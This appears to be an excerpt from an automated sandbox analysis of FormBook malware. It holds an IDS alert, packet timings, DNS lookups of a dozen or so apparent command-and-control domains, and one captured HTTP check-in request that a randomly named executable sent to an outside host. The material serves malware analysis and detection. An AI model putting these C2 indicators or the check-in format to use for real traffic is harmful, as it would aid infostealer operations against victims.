2024-09-26T09:26:42.606058+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49780 | 85.159.66.93 | 80 | TCP
                                                    Sep 26, 2024 09:25:02.041214943 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:02.046051979 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640258074 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640279055 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640352011 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:03.543514967 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.565210104 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.570391893 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.570494890 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.581918001 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.586836100 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586853981 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586885929 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586894989 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586905003 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586914062 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587188005 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587207079 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587228060 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171155930 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171176910 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171227932 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:06.090332031 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.110300064 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.115422010 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.115539074 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.126127958 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.131171942 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759850979 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759877920 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759890079 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759988070 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.763413906 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.768379927 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:13.312974930 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.317832947 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.317895889 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.335305929 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.340269089 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.975920916 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.975945950 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.976010084 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:14.840323925 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.860204935 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.865226030 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:15.865312099 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.876813889 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.881670952 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.517745018 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.518083096 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.518558979 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:17.387260914 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.407304049 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.412254095 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.415419102 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.427360058 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.433301926 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433365107 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433393955 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433424950 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433451891 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434474945 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434503078 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434546947 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434573889 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.074285984 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.074382067 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.075531006 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:19.934156895 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.955429077 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.960378885 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:20.960766077 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.968595982 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.973444939 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.625936031 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.626044989 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.626142979 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:21.629627943 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:21.634533882 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:26.669290066 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.674209118 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:26.674427986 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.689239979 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.694668055 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.201219082 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538357973 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538377047 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538388014 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538450003 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538450003 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538525105 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538990021 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.539079905 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.539381981 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.539501905 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.540839911 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.541014910 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.219043016 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.224152088 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.224255085 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.238564014 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.243537903 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847120047 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847426891 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847471952 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:30.746700048 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.779706955 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.784846067 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.784920931 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.802073956 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.806988001 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807014942 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807053089 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807061911 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807070017 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807173014 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807182074 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807214022 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807223082 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503022909 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503079891 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503709078 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:33.309079885 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.328795910 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.333697081 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.333899975 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.343224049 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.348031998 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954703093 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954732895 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954936981 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.968432903 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.973315001 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:40.005772114 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.010773897 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.010855913 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.024842978 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.029813051 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.469878912 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.470004082 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:41.527853966 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:41.532964945 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:42.546902895 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.552232981 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:42.553505898 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.565227985 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.570101976 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:43.015055895 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:43.017322063 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:44.079663038 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:44.084660053 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.093739033 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.098759890 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.098912954 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.111304998 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.116568089 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116590023 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116602898 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116615057 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116638899 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116652012 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116662979 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116673946 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116684914 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.577481985 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.577549934 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:46.622828960 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:46.935239077 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.072933912 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.072952986 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.073081017 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.640969038 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.646002054 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.646080017 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.655144930 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.660164118 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123720884 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123748064 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123872042 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:48.127863884 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:48.132750988 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:26:07.284681082 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.289506912 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:07.289583921 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.303767920 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.308657885 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214174032 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214202881 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214267969 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:08.811434984 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.828202963 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.833204985 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:09.833277941 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.845237017 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.850131989 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737025023 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737200975 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737327099 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:11.356021881 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.374984026 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.380039930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.380134106 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.392280102 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.397192955 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397207022 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397227049 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397236109 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397244930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397317886 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397327900 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397411108 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397419930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288069010 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288141966 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288202047 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:13.902865887 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.922246933 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.927179098 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:14.927259922 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.937247992 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.942075968 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665250063 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665292025 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665302038 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665501118 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.665829897 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665920019 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.666527033 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.666606903 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.668308020 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.673217058 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:22.608222961 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:22.613029957 CEST8049774103.224.182.242192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 09:23:44.306485891 CEST | 192.168.2.4 | 1.1.1.1 | 0xdde2 | Standard query (0) | www.woshop.online | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:23:49.328613043 CEST | 192.168.2.4 | 1.1.1.1 | 0x4b4b | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:23:54.343935013 CEST | 192.168.2.4 | 1.1.1.1 | 0xd0f9 | Standard query (0) | www.elsupertodo.net | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:10.484860897 CEST | 192.168.2.4 | 1.1.1.1 | 0x2787 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:26.578356028 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8b6 | Standard query (0) | www.tekilla.wtf | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:40.438309908 CEST | 192.168.2.4 | 1.1.1.1 | 0x38a1 | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:59.408082962 CEST | 192.168.2.4 | 1.1.1.1 | 0x4569 | Standard query (0) | www.languagemodel.pro | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:12.783231020 CEST | 192.168.2.4 | 1.1.1.1 | 0x132d | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:26.647103071 CEST | 192.168.2.4 | 1.1.1.1 | 0x6598 | Standard query (0) | www.jobworklanka.online | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:39.985582113 CEST | 192.168.2.4 | 1.1.1.1 | 0x7982 | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:53.140913010 CEST | 192.168.2.4 | 1.1.1.1 | 0xa67d | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:26:06.721239090 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8aa | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:26:21.688637972 CEST | 192.168.2.4 | 1.1.1.1 | 0xa93e | Standard query (0) | www.nobartv6.website | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:26:35.875566959 CEST | 192.168.2.4 | 1.1.1.1 | 0x6448 | Standard query (0) | www.sailnway.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 09:23:44.315968037 CEST | 1.1.1.1 | 192.168.2.4 | 0xdde2 | Name error (3) | www.woshop.online | none | none | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:23:49.338507891 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b4b | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:23:54.818943977 CEST | 1.1.1.1 | 192.168.2.4 | 0xd0f9 | No error (0) | www.elsupertodo.net | | 148.72.152.174 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:10.503878117 CEST | 1.1.1.1 | 192.168.2.4 | 0x2787 | No error (0) | www.omexai.info | omexai.info | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:24:10.503878117 CEST | 1.1.1.1 | 192.168.2.4 | 0x2787 | No error (0) | omexai.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:10.503878117 CEST | 1.1.1.1 | 192.168.2.4 | 0x2787 | No error (0) | omexai.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:27.300833941 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8b6 | No error (0) | www.tekilla.wtf | redirect.3dns.box | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:24:27.300833941 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8b6 | No error (0) | redirect.3dns.box | | 172.191.244.62 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:40.811199903 CEST | 1.1.1.1 | 192.168.2.4 | 0x38a1 | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:24:40.811199903 CEST | 1.1.1.1 | 192.168.2.4 | 0x38a1 | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:24:59.460661888 CEST | 1.1.1.1 | 192.168.2.4 | 0x4569 | No error (0) | www.languagemodel.pro | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:24:59.460661888 CEST | 1.1.1.1 | 192.168.2.4 | 0x4569 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:13.309989929 CEST | 1.1.1.1 | 192.168.2.4 | 0x132d | No error (0) | www.kexweb.top | | 63.250.47.40 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:26.663638115 CEST | 1.1.1.1 | 192.168.2.4 | 0x6598 | No error (0) | www.jobworklanka.online | jobworklanka.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:25:26.663638115 CEST | 1.1.1.1 | 192.168.2.4 | 0x6598 | No error (0) | jobworklanka.online | | 91.184.0.200 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:40.002870083 CEST | 1.1.1.1 | 192.168.2.4 | 0x7982 | No error (0) | www.dyme.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:40.002870083 CEST | 1.1.1.1 | 192.168.2.4 | 0x7982 | No error (0) | www.dyme.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:25:53.205543995 CEST | 1.1.1.1 | 192.168.2.4 | 0xa67d | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:26:07.281342030 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8aa | No error (0) | www.mizuquan.top | | 43.242.202.169 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:26:22.605562925 CEST | 1.1.1.1 | 192.168.2.4 | 0xa93e | No error (0) | www.nobartv6.website | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:26:35.976186037 CEST | 1.1.1.1 | 192.168.2.4 | 0x6448 | No error (0) | www.sailnway.net | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:26:35.976186037 CEST | 1.1.1.1 | 192.168.2.4 | 0x6448 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 09:26:35.976186037 CEST | 1.1.1.1 | 192.168.2.4 | 0x6448 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 148.72.152.174 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:23:54.838567019 CEST | 545 | OUT | GET /2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.elsupertodo.net
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 26, 2024 09:23:55.433655977 CEST | 528 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:23:55 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: close
                                                    Location: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI
                                                    X-XSS-Protection: 1; mode=block
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
